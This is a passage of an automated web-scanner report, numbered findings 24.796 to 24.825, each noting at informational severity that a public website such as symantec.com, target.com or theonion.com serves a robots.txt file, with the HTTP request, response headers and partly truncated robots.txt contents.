Date: Sat, 02 Apr 2011 13:37:42 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 06 Dec 2010 15:36:08 GMT
ETag: "94ba-2a-496bfa5988a00"
Accept-Ranges: bytes
Content-Length: 42
Cache-Control: max-age=172800
Expires: Mon, 04 Apr 2011 13:37:42 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: SUNT=SUNT_ECP11; path=/
Cache-control: private

User-agent: *
Disallow: /csp/
Allow: /
24.796. http://www.superiorpics.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superiorpics.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.superiorpics.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:18:40 GMT
Server: Apache/1.3.41 (Unix)
Last-Modified: Fri, 10 Jul 2009 08:04:07 GMT
ETag: "1deb0a6-2e-4a56f5f7"
Accept-Ranges: bytes
Content-Length: 46
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /newdesign/
Allow: /

24.797. http://www.superpages.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.superpages.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:24:29 GMT
Server: Unspecified
Vary: Host
Last-Modified: Thu, 02 Sep 2010 18:29:44 GMT
ETag: "5939-169-48f4aff837600"
Accept-Ranges: bytes
Content-Length: 361
Connection: close
Content-Type: text/plain
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff9482136245525d5f4f58455e445a4a423660;expires=Sat, 02-Apr-2011 13:39:29 GMT;path=/;httponly

User-agent: *
Disallow: /about/contact.html
Disallow: /about/feedback.html
Disallow: /adcode/
Disallow: /RealMedia/ads/
Disallow: /about/search_within_map_feedback.html
Disallow: /products/mail.html
D
...[SNIP]...
24.798. http://www.symantec.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.symantec.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Fri, 01 Apr 2011 22:06:47 GMT
ETag: "1167-4d964c77"
Content-Type: text/plain
Cache-Control: public, max-age=720
Date: Sat, 02 Apr 2011 13:26:54 GMT
Content-Length: 4455
Connection: close

# Standard List
User-agent: *
Disallow: /common/
Disallow: /content/
Disallow: /corp/
Disallow: /css/
Disallow: /ssi/
Disallow: /lib/
Disallow: /errors/
Disallow: /feedback/
Disallow: /media
...[SNIP]...
24.799. http://www.t-mobile.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.t-mobile.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.t-mobile.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 31 Mar 2011 20:53:23 GMT
Accept-Ranges: bytes
ETag: "ae74d1ace5efcb1:0"
Server: Microsoft-IIS/7.0
Date: Sat, 02 Apr 2011 13:31:15 GMT
Connection: close
Content-Length: 34

User-agent: *
Disallow: /


24.800. http://www.tagged.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tagged.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:08 GMT
Server: Apache
Last-Modified: Wed, 02 Feb 2011 17:13:08 GMT
ETag: "6972a8-1214-49b4fc34a7100"
Accept-Ranges: bytes
Content-Length: 4628
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

#########################################################################
# /robots.txt file for http://www.tagged.com/
# mail webmaster@tagged.com for constructive criticism
#########################
...[SNIP]...
24.801. http://www.talkingpointsmemo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.talkingpointsmemo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.talkingpointsmemo.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:51:51 GMT
Keep-Alive: timeout=10, max=999
Accept-Ranges: bytes
ETag: "7a4e2d-54-3db2d713d8380"
Connection: close
Last-Modified: Mon, 24 May 2004 15:39:10 GMT
Content-Length: 84

User-agent: *
Disallow: /blogads/
Disallow: /mt/
Disallow: /old/
Disallow: /zander/
24.802. http://www.tampabay.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tampabay.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tampabay.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 13:39:21 GMT
Content-Type: text/plain
Connection: close
Cache-control: public,private
Last-modified: Thu, 17 Mar 2011 20:37:18 GMT
Etag: "189-4d8270fe"
Content-Length: 393
X-Varnish: 380322949 380310991
Age: 187
Via: 1.1 varnish
X-Served-By: varnish-a
X-Cache: HIT
X-Cache-Hits: 1
X-Cache-Backend: default

User-agent: *
Disallow: /cgi-bin/
Disallow: /site/comment/
Disallow: /site/comments/
Disallow: /site/images/

Sitemap: http://www.tampabay.com/sitemap.xml
Sitemap: http://www.tampabay.com/news_sitemap
...[SNIP]...
24.803. http://www.target.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.target.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.target.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:38:21 GMT
Server: Server
Last-Modified: Fri, 14 Jan 2011 22:27:33 GMT
ETag: "459-f0bf5f40"
Accept-Ranges: bytes
Content-Length: 1113
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/plain
Connection: close

# /robots.txt
Sitemap: http://www.target.com/sitemap_index.xml.gz
Sitemap: http://tgtfiles.target.com/sitemaps/sitemap_search_keywords.xml.gz

User-agent: *
Disallow: /gp/your-store/
Disallow: /gp/mya
...[SNIP]...
24.804. http://www.tastebook.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tastebook.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tastebook.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:09:10 GMT
Server: Apache
Last-Modified: Thu, 31 Mar 2011 10:51:02 GMT
Accept-Ranges: bytes
Content-Length: 1736
Cache-Control: max-age=604800
Expires: Sat, 09 Apr 2011 14:09:10 GMT
Vary: Accept-Encoding
P3P: policyref="http://www.tastebook.com/w3c/p3p.xml", CP="ALL DSP COR LAW CURa CONi OUR BUS IND PHY ONL UNI PUR COM NAV STA"
Connection: close
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
User-Agent: *
Disallow: /tastebooks/preview/
Disallow: /tastebooks/update/
Disallow: /account
Disall
...[SNIP]...
24.805. http://www.techbargains.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.techbargains.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.techbargains.com

Response

HTTP/1.1 200 OK
P3p: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Set-Cookie: JSESSIONID=845A51D48598ED45B270E5085B15C868; Path=/
Set-Cookie: TEMPTBVERSIONCOOKIE=IkNVUlJFTlRWRVJTSU9OPTIiLCJDVVJSRU5UREFURT0wNC8wMi8yMDExIDA3OjAyOjUyIFBEVCIsIkNVUlJFTlRNRVRIT0Q9UEFSVE9GVEVTVCIsIklOSVRJQUxWRVJTSU9OPTIiLCJJTklUSUFMTUVUSE9EPVBBUlRPRlRFU1QiLCJJTklUSUFMREFURT0wNC8wMi8yMDExIDA3OjAyOjUyIFBEVCIsIlJVTEVJRD1KIiwiVEFSR0VUSUQ9MjEiLCJTRVNTSU9OSUQ9NmMyMTQzZjQtMmZhNS00NDFhLWE1OWYtZDZkMjFmZDJhMzUwIg==; Domain=techbargains.com; Expires=Sat, 02-Apr-2011 14:32:52 GMT; Path=/
Set-Cookie: TBUSERCOOKIE=IlVTRVJJRD05MWIzNmJjYi03ZmRlLTQwYjgtYTk4My0zNTY0YjdmMWNiNGYiLCJSRUZFUlJBTFVSTD0iLCJMQU5ESU5HUEFHRT0vcm9ib3RzLnR4dCIsIkRBVEVDUkVBVEVEPTA0LzAyLzIwMTEgMDc6MDI6NTIgUERUIiwiVkVSU0lPTj0xLjAi; Domain=techbargains.com; Expires=Thu, 20-Apr-2079 17:16:59 GMT; Path=/
Set-Cookie: TBSESSIONCOOKIE=IlNFU1NJT05JRD02YzIxNDNmNC0yZmE1LTQ0MWEtYTU5Zi1kNmQyMWZkMmEzNTAiLCJEQVRFQ1JFQVRFRD0wNC8wMi8yMDExIDA3OjAyOjUyIFBEVCI=; Domain=techbargains.com; Expires=Sat, 02-Apr-2011 14:32:52 GMT; Path=/
Set-Cookie: TBCOUPONCOOKIE=IkNPVVBPTklEUz0i; Domain=techbargains.com; Expires=Thu, 20-Apr-2079 17:16:59 GMT; Path=/
Set-Cookie: TBVERSIONCOOKIE=IkNVUlJFTlRWRVJTSU9OPTEiLCJDVVJSRU5UTUVUSE9EPUFTU0lHTkVEIiwiQ1VSUkVOVERBVEU9MDQvMDIvMjAxMSAwNzowMjo1MiBQRFQiLCJJTklUSUFMVkVSU0lPTj0xIiwiSU5JVElBTE1FVEhPRD1BU1NJR05FRCIsIklOSVRJQUxEQVRFPTA0LzAyLzIwMTEgMDc6MDI6NTIgUERUIg==; Domain=techbargains.com; Expires=Thu, 20-Apr-2079 17:16:59 GMT; Path=/
Set-Cookie: TBSVALCOOKIE=InVzZXJUeXBlPW5ldyIsImN1cnJlbnRVcmw9L3JvYm90cy50eHQi; Domain=techbargains.com; Expires=Sat, 02-Apr-2011 14:32:52 GMT; Path=/
Cache-Control: no-store
Content-Length: 2035
Date: Sat, 02 Apr 2011 14:02:52 GMT
Connection: close
Last-Modified: Mon, 21 Mar 2011 11:39:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/plain;charset=ISO-8859-1

User-agent: *
Disallow: /i/
Disallow: /ipb/
Disallow: /j/
Disallow: /landing/
Disallow: /test/
Disallow: /alertfind.cfm
Disallow: /cjump.cfm
Disallow: /dealsearch.cfm
Disallow: /doubleredir.c
...[SNIP]...
24.806. http://www.telegraph.co.uk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.telegraph.co.uk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.telegraph.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 29 Mar 2011 14:01:19 GMT
ETag: "66c855-1ae-49f9f7e92ab3b"
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:34:59 GMT
Content-Length: 430
Connection: close

# Robots.txt file
# All robots will spider the domain

User-agent: *

Disallow: */ixale/
Disallow: /core/Content/
Disallow: /*?source=rss
Disallow: /*?source=refresh
Disallow: /*?mobile=true
...[SNIP]...
24.807. http://www.terra.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.terra.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.terra.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:43 GMT
Server: Apache
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1301753983.248502; path=/; expires=Fri, 01-Jan-2016 00:02:22 GMT; domain=.terra.com
Last-Modified: Thu, 09 Sep 2010 12:20:27 GMT
ETag: "74313e-2f6-48fd2a7be18c0"
Accept-Ranges: bytes
Content-Length: 758
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: ia_archiver
Disallow: /
User-agent: *
Disallow: /agenda-en/
Disallow: /actualidad/
Disallow: /arte/
Disallow: /ciencia/
Disallow: /content/
Disallow: /cgi-bin/
Disallow: /internet/
Disallo
...[SNIP]...
24.808. http://www.textsfromlastnight.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.textsfromlastnight.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.textsfromlastnight.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 13:45:12 GMT
Content-Type: text/plain
Content-Length: 24
Last-Modified: Sat, 02 Jan 2010 17:03:25 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow:
24.809. http://www.theatlantic.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theatlantic.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.theatlantic.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 13:45:48 GMT
Content-Type: text/plain
Content-Length: 771
Last-Modified: Tue, 07 Dec 2010 16:50:46 GMT
Connection: close
Vary: Accept-Encoding
Expires: Mon, 02 May 2011 13:45:48 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

User-agent: *
Disallow: /james-fallows/*/*
Disallow: /james-fallows/*/?cid=*
Disallow: /megan-mcardle/*/*
Disallow: /derek-thompson/*/*
Disallow: /marc-ambinder/*/*
Disallow: /ta-nehisi-coates/*/*
Dis
...[SNIP]...
24.810. http://www.thedailybeast.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thedailybeast.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 16 Mar 2011 22:57:59 GMT
ETag: "dc48f1-85-79e7cbc0"
Accept-Ranges: bytes
Content-Length: 133
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:40:10 GMT
Connection: close

User-agent: *

Disallow: /templates/wap/
Disallow: /partnersfeed/
Disallow:


Sitemap: http://www.thedailybeast.com/sitemap.xml.gz

24.811. http://www.thedailyshow.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thedailyshow.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thedailyshow.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.1
X-Powered-By: PHP/5.3.1
Content-Length: 121
Content-Type: text/plain
Cache-Control: max-age=6653
Expires: Sat, 02 Apr 2011 15:22:41 GMT
Date: Sat, 02 Apr 2011 13:31:48 GMT
Connection: close

User-agent: *
Disallow: /dailyshow/
Disallow: /videos/tag/Barack+Obama1*
Sitemap: http://www.thedailyshow.com/sitemap.xml
24.812. http://www.thedietsolutionprogram.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thedietsolutionprogram.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thedietsolutionprogram.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:34:43 GMT
Accept-Ranges: bytes
ETag: "0e93d81e09fcb1:0"
Connection: close
Last-Modified: Mon, 20 Dec 2010 00:54:50 GMT
X-Powered-By: ASP.NET
Content-Length: 356

User-Agent: *
Disallow: /TSAudioDLs.aspx
Disallow: /dlpage.aspx
Disallow: /DLSection
Disallow: /reports
Disallow: /Customers
Disallow: /Order-tr.aspx
Disallow: /DSPAdmin
Disallow: /Customers

...[SNIP]...
24.813. http://www.theepochtimes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theepochtimes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.theepochtimes.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Thu, 15 Jul 2010 20:11:24 GMT
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
Content-Length: 24
Date: Sat, 02 Apr 2011 14:05:24 GMT
X-Varnish: 191880444
Age: 0
Via: 1.1 varnish
Connection: close

User-agent: *
Allow: /

24.814. http://www.thefind.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thefind.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thefind.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:09 GMT
Server: Apache
Set-Cookie: flsid=7b4b853f912749194c888056171905a5; path=/
Expires: Sat, 02 Apr 2011 12:53:09 GMT
Cache-Control: public, s-maxage=600, max-age=600
Last-Modified: Thu, 31 Mar 2011 05:45:53 GMT
Set-Cookie: fl-uid=0b324997204face52f7fafc99c56b03a%2C1%2C1301748189; expires=Sun, 01-Apr-2012 12:43:09 GMT; path=/; domain=.thefind.com
Content-Language: en
Status: 200 OK
Content-Length: 151
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /buyit.php
Disallow: /buy-*
Disallow: /query.php
Disallow: /main/query.php
Disallow: /search
Disallow: /cluster
Disallow: /*?

24.815. http://www.thefreedictionary.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thefreedictionary.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thefreedictionary.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Language: en
Server: Microsoft-IIS/7.5
P3P: CP="CAO PSA OUR"
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "info@farlex.com" on "2009.10.07T10:15-0400" exp "2013.12.31T12:00-0400" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)), (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "info@farlex.com" on "2009.10.07T10:15-0400" exp "2013.12.31T12:00-0400" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "info@farlex.com" on "2009.10.07T10:15-0400" exp "2013.12.31T12:00-0400" r (v 0 s 0 n 0 l 0)), (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "info@farlex.com" on "2009.10.07T10:15-0400" exp "2013.12.31T12:00-0400" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "info@farlex.com" on "2009.10.07T10:15-0400" exp "2013.12.31T12:00-0400" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "info@farlex.com" on "2009.10.07T10:15-0400" exp "2013.12.31T12:00-0400" r (l 0 s 0 v 0 o 0))
Date: Sat, 02 Apr 2011 13:27:09 GMT
Connection: close
Content-Length: 910


User-agent: Mediapartners-Google*
Disallow:

User-agent: NPBot
Disallow: /

User-agent: msrbot
Disallow: /

User-Agent: Open*
Disallow: /

User-Agent: Twiceler
Disallow: /

User-Agent
...[SNIP]...
24.816. http://www.thefreelibrary.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thefreelibrary.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thefreelibrary.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: track=2; domain=.thefreelibrary.com; path=/
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:39:57 GMT
Connection: close
Content-Length: 695

User-agent: NPBot
Disallow: /

User-Agent: Open*
Disallow: /

User-Agent: Twiceler
Disallow: /

User-Agent: Scooter*
Disallow: /

User-Agent: WebSearch*
Disallow: /

User-Agent: ZyBorg*
...[SNIP]...
24.817. http://www.thefrisky.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thefrisky.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thefrisky.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 04 Jun 2010 16:11:09 GMT
ETag: "32b403-40e1-48836922ee140"
Content-Type: text/plain
Cache-Control: max-age=153437
Date: Sat, 02 Apr 2011 13:33:13 GMT
Content-Length: 16609
Connection: close
Vary: Accept-Encoding

Sitemap: http://www.thefrisky.com/gsitemap
Sitemap: http://www.thefrisky.com/feed/sitemap/celebs/
Sitemap: http://www.thefrisky.com/feed/sitemap/entertainment/
Sitemap: http://www.thefrisky.com/feed/s
...[SNIP]...
24.818. http://www.theglobeandmail.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theglobeandmail.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.theglobeandmail.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Ubuntu) Resin/3.1.8
Last-Modified: Mon, 07 Mar 2011 23:10:42 GMT
ETag: "67-49dec9acfe080"
Vary: Accept-Encoding
P3P: policyref="http://www.theglobeandmail.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONi OUR NOR IND PHY ONL UNI COM NAV INT DEM STA PRE"
X-ServerName: Web4
Content-Type: text/plain
Content-Length: 103
Date: Sat, 02 Apr 2011 13:56:23 GMT
X-Varnish: 744761752 744384336
Age: 2756
Via: 1.1 varnish
Connection: close
Set-Cookie: BIGipServerEceweb=402840586.20736.0000; path=/

#User-agent: *
#Disallow: /sports/soccer/worldcup2010newsfeed/
#Disallow: /news/world/g8-g20/newsfeed/
24.819. http://www.theonion.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theonion.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.theonion.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:15 GMT
Server: PWS/1.7.1.5
X-Px: ms iad-agg-n33 ( iad-agg-n5), ht iad-agg-n5.panthercdn.com
ETag: "126e2-76-482a769dbbb80"
Cache-Control: max-age=604800
Expires: Sat, 09 Apr 2011 02:31:43 GMT
Age: 40112
Content-Length: 118
Content-Type: text/plain
Last-Modified: Thu, 25 Mar 2010 22:17:34 GMT
Connection: close

User-Agent: *
Allow: /
Sitemap: http://www.theonion.com/sitemap.xml
Sitemap: http://www.theonion.com/sitemap_news.xml
24.820. http://www.thesaurus.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thesaurus.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thesaurus.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:48 GMT
Server: Apache
Content-Type: text/plain;charset=UTF-8
Content-Length: 598
Connection: close

User-agent: Googlebot
Disallow:

User-agent: googlebot-image
Disallow:

User-agent: googlebot-mobile
Disallow:

User-agent: MSNBot
Disallow:

User-agent: Slurp
Disallow:

User-agen
...[SNIP]...
24.821. http://www.thirdage.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thirdage.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thirdage.com

Response

HTTP/1.1 200 OK
Server: Apache
X-Varnish: 635032732
Vary: Accept-Encoding
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:40:56 GMT
X-Varnish-Cache: MISS
Web-Head: web09.advomatic.com
Via: 1.1 varnish
Connection: close
Last-Modified: Fri, 25 Mar 2011 21:07:02 GMT
Age: 0
Content-Length: 1891

# $Id: robots.txt,v 1.7.2.3 2008/12/10 20:24:38 drumm Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by
...[SNIP]...
24.822. http://www.thisis50.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thisis50.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thisis50.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:10:21 GMT
Server: Jetty/5.1.15 (SunOS/5.10 x86 java/1.6.0_03
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: xn_visitor=fe902e8a-e1f8-4147-aa6e-9f38dc5bad29;Path=/;Domain=.thisis50.com;Expires=Tue, 30-Mar-21 14:10:21 GMT
Set-Cookie: ning_session=QJDMeP1uBcWdCHu2Em3vKzvdHgeSpdB5Y4fXQoACNrQLzlC60RygV5LuU8EhW70VsupRYa4awCw=;Path=/;Domain=.thisis50.com;Expires=Sat, 02-Apr-11 15:10:21 GMT
X-XN-Trace-Token: f297dc60-6e04-4939-a19a-aba7b83e628b
Date: Sat, 02 Apr 2011 13:44:36 GMT
Date: Sat, 02 Apr 2011 13:44:36 GMT
P3P: CP="UNI STA LOC CURa OURa COR ALL IND"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 13:44:36 UTC
CACHE-CONTROL: max-age=0
CACHE-CONTROL: no-cache="Set-Cookie"
Content-Type: text/plain
Server: Ning HTTP Server 2.0
Content-Length: 184
Connection: close

User-agent: *
Disallow: /xn/ningbar.php/
Disallow: /xn/atom/
Disallow: /xn/rest/
Disallow: /xn/css/
Disallow: /xn/loader/
Disallow: /main/search/search/
Disallow: /main/authorization/
24.823. http://www.thisoldhouse.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thisoldhouse.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thisoldhouse.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:13:08 GMT
Server: Apache
Last-Modified: Mon, 25 Feb 2008 23:18:00 GMT
ETag: "267-c86e7a00"
Accept-Ranges: bytes
Content-Length: 615
Content-Type: text/plain; charset=utf-8
Vary: Accept-Encoding,X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

# Welcome to Pathfinder's robots.txt
#
# If you have any questions about indexing our site,
# especially regarding more efficient or convenient
# methods, please write to:
#
#
...[SNIP]...
24.824. http://www.thomasnet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thomasnet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thomasnet.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:59:01 GMT
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.7a PHP/5.2.14
Last-Modified: Thu, 24 Jun 2010 13:51:35 GMT
ETag: "3645f6-7be-f3e147c0"
Accept-Ranges: bytes
Content-Length: 1982
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /404.html
Disallow: /adlink.html
Disallow: /advsearch.html
Disallow: /browse.html
Disallow: /browsecatalogcats.html
Disallow: /businessweek.html
Disallow: /cadcb.html
Disallow:
...[SNIP]...
24.825. http://www.thriftyfun.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thriftyfun.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thriftyfun.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:04 GMT
Server: Apache
Last-Modified: Mon, 19 Mar 2007 18:35:36 GMT
ETag: "359-42c0bdaebee00"
Accept-Ranges: bytes
Content-Length: 857
Cache-Control: max-age=60
Expires: Sat, 02 Apr 2011 13:40:04 GMT
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
X-Debug: thrifty
Connection: close
Content-Type: text/plain

# robots.txt
#
# For more info in this file take a look at
# http://info.webcrawler.com/mak/projects/robots/norobots.html
# http://www.kollar.com/robots.html
#
User-agent: *
Disallow: /logs/
Disallow:
...[SNIP]...
